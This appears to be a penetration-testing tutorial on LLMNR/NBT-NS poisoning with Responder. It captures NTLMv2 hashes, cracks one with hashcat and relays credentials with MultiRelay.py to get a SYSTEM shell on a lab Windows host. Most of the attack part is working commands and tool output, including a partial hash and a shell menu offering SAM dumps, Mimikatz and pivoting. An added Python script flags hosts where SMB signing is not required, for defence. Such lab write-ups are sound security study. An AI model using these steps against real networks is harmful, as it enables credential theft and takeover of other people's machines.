Capturing NTLMv2 hashes with Responder


Responder configuration

Download

https://github.com/lgandx/Responder

Responder poisons LLMNR and NBT-NS requests.
The modules to enable are configured in Responder.conf in the tool's directory.
If you only need to capture NTLMv2 hashes, the default configuration is sufficient; the hashes are then brute-forced with Hashcat.
If you want to use NTLM relay, the configuration file has to be modified.

Cracking the captured NTLMv2 hash

Kali ships with Hashcat, which saves the trouble of installing it.
On Linux, extract Responder, enter its directory and run:

Capturing NTLMv2

python Responder.py -I eth0

Here eth0 is the interface to listen on.
In local testing, NTLMv2 hashes were obtained in both a domain and a workgroup environment.
Once captured, the records can be found under ./log.

Cracking the password with hashcat

hashcat -m 5600 Administrator::TEST:2f1fd6519d27c... root/1234.txt --force

Here 5600 is the hashcat mode for NTLMv2. To keep the test fast, a wordlist of only a few passwords is used.

Getting a shell via relay

This method requires that SMB signing is not enforced on the target; by default only domain controllers require SMB signing.
For how to enable it, see:

https://www.cnblogs.com/xiejn/p/13686620.html

Configure Responder.conf.
./tools contains RunFinger.py and MultiRelay.py.
Use RunFinger.py to check whether SMB signing is required:

[root@localhost tools]# python RunFinger.py -i 192.168.164.138
[SMB2]:['192.168.164.138', Os:'Windows 7/Server 2008R2', Build:'7601', Domain:'WIN-ORHR1E13JIO', Bootime: 'Last restart: 2021-03-03 17:08:46', Signing:'False', RDP:'True', SMB1:'Enabled']
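From the defender's side, the same RunFinger output is an inventory of which hosts would accept a relayed authentication. The following is an added example (not part of the original post or of Responder) that parses RunFinger lines and flags hosts where signing is not required or SMB1 is still enabled; the first sample line is the one shown above, the second is a constructed line for a hardened host with a hypothetical address.

```python
import re

# Constructed sample: line 1 is copied from the post's RunFinger output,
# line 2 is a constructed entry for a hardened host (hypothetical IP/domain).
SAMPLE_OUTPUT = """\
[SMB2]:['192.168.164.138', Os:'Windows 7/Server 2008R2', Build:'7601', Domain:'WIN-ORHR1E13JIO', Bootime: 'Last restart: 2021-03-03 17:08:46', Signing:'False', RDP:'True', SMB1:'Enabled']
[SMB2]:['192.0.2.10', Os:'Windows Server 2019', Build:'17763', Domain:'EXAMPLE', Bootime: 'Last restart: 2021-03-01 08:00:00', Signing:'True', RDP:'False', SMB1:'Disabled']
"""

# "[SMB2]:['<ip>', Key:'value', Key:'value', ...]"
LINE_RE = re.compile(r"^\[(?P<proto>SMB\d?)\]:\['(?P<ip>[^']+)',\s*(?P<rest>.*)\]$")
# Key:'value' pairs; the quoted value is consumed whole, so the colon inside
# "Last restart: ..." is not mistaken for a new key.
FIELD_RE = re.compile(r"(\w+):\s*'([^']*)'")


def parse_runfinger(text):
    """Return one dict per RunFinger result line (ip, proto, and the Key fields)."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banners, blank lines, hosts that did not answer
        fields = dict(FIELD_RE.findall(m.group("rest")))
        hosts.append({"ip": m.group("ip"), "proto": m.group("proto"), **fields})
    return hosts


def relay_exposed(host):
    """Signing not required means a relayed NTLM authentication would be accepted."""
    return host.get("Signing", "").lower() != "true"


def audit(text):
    """Map each host to the list of findings that make it a relay target."""
    findings = []
    for h in parse_runfinger(text):
        issues = []
        if relay_exposed(h):
            issues.append("SMB signing not required")
        if h.get("SMB1", "").lower() == "enabled":
            issues.append("SMB1 enabled")
        findings.append((h["ip"], issues))
    return findings


if __name__ == "__main__":
    for ip, issues in audit(SAMPLE_OUTPUT):
        print(ip, "OK" if not issues else "; ".join(issues))
```

Hosts reported with "SMB signing not required" are the ones on which enforcing signing (the setting referenced by the link above) removes the relay path.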

Relaying with MultiRelay.py

python3 MultiRelay.py -t 192.168.164.138 -u ALL

The IP here should be the same one checked above, i.e. the target whose SMB signing is not enforced.
Then simulate use of the SMB service: any request to a host from the victim is enough.

[root@localhost tools]# python3 MultiRelay.py -t 192.168.164.138 -u ALL

Crypto lib is not installed. You won't be able to live dump the hashes.
You can install it on debian based os with this command: apt-get install python-crypto
The Sam file will be saved anyway and you will have the bootkey.


Responder MultiRelay 2.5 NTLMv1/2 Relay

Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.

/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.

This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/

Relaying credentials for these users:
['ALL']


Retrieving information for 192.168.164.138...
SMB signing: False
Os version: 'Windows Server 2008 R2 Datacenter 7601 Service Pack 1'
Hostname: 'WIN-ORHR1E13JIO'
Part of the 'WORKGROUP' domain
[+] Setting up SMB relay with SMB challenge: 9707c4caa56863f4
[+] Received NTLMv2 hash from: 192.168.164.139 
[+] Client info: ['Windows Server 2008 R2 Datacenter 7601 Service Pack 1', domain: 'WORKGROUP', signing:'False']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate

Available commands:
dump               -> Extract the SAM database and print hashes.
regdump KEY        -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File  -> Read a file (eg: read /windows/win.ini)
get  Path_To_File  -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \windows\temp\
runas  Command     -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot  IP address  -> Connect to another host (eg: pivot 10.0.0.12)
mimi  command      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32  command    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd  command      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help               -> Print this message.
exit               -> Exit this shell and return in relay mode.
                      If you want to quit type exit and then use CTRL-C

Any other command than that will be run as SYSTEM on the target.

Connected to 192.168.164.138 as LocalSystem.
C:\Windows\system32\:#

A shell was obtained successfully.
However, when reproducing this locally, the domain-joined machine could not be relayed successfully; on inspection it also could not be logged into over SMB by the normal login method. A freshly cloned machine that had not joined the domain worked, so this may be an anomaly of my virtual machine.

References

https://xz.aliyun.com/t/3560
